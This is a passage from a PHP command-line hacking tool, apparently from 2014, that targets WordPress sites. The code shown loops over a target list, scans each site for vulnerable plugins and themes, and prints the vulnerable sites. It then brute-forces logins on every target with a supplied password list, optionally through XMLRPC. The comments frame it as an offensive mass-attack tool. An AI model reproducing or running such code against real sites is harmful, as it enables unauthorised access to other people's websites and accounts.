693.        print "\n[+] Scanning begun";
694.         $targets = file_get_contents('wp.txt');
695.         $r00t3rz = explode("\n", $targets);
696.         foreach($r00t3rz as $z){
697.             if(!$z == ""){
698.                 xp_get_plugins($z);
699.                 xp_get_themes($z);
700.             }
701.         }
702.         #################
703.        ##   Results   ##
704.        #################
705.        print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
706.         $vulpl = file_get_contents('vulpl.txt');
707.         $getpl = explode("\n", $vulpl);
708.         #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
709.        foreach($getpl as $vul){
710.             if(!$vul==""){
711.                 print "\n\t$vul";
712.             }
713.         }
714.         bye();
715.     } elseif($what == "3") {
716.         print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
717.         $list = trim(fgets(STDIN));
718.         if(!is_file($list)) {
719.             #######################
720.            ##  CAN'T LOAD LIST  ##
721.            #######################
722.            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
723.             ##############
724.            ##   EXIT   ##
725.            ##############
726.            bye();
727.         }
728.         #################
729.        ##   POOYAA!   ##
730.        #################
731.        print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
732.         $xmlrpc = strtolower(trim(fgets(STDIN)));
733.         if(in_array($xmlrpc, $yesno)){
734.             $xml = "set";
735.         }else{
736.             $xml = NULL;
737.         }
738.         print "\n[+] Bruting begun";
739.         $targets = file_get_contents('wp.txt');
740.         $xp = explode("\n", $targets);
741.         foreach($xp as $z){
742.             if(!$z == ""){
743.                 xp_get_user($z, $list, $xml);
744.             }
745.         }
746.         bye();
747.     } else {
748.         ######################
749.        ##  OOH KILL'EM =P  ##
750.        ######################
751.        bye();
752.     }
753. }
754. #####################################
755. ##  © ALM3REFH.COM 2014 - CHEERS!  ##
756. #####################################
757. ?>